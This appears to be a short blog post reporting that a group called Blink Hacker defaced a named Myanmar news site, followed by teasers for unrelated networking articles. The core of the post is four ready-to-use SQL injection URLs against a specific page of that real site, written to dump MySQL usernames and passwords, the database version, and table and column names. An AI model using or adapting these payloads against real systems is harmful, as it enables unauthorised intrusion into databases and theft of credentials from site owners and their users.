A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

Subnetting an IP address

IP subnetting is a fundamental subject that’s critical for any IP network engineer to understand, yet students have traditionally had a difficult time grasping it. Over the years, I’ve watched

Read More

You’ve Hired a Hacker

There is a wonderful variety among humans. Ethnicity and culture provide one of the most important dimensions–but there can be profound differences between two people who look the same. If

Read More

What are the various methods of passive OS fingerprinting?

In passive OS fingerprinting, an attacker installs a sniffer on any third party such as a router on which the victim communicates frequently. Now he studies the sniffer’s log and

Read More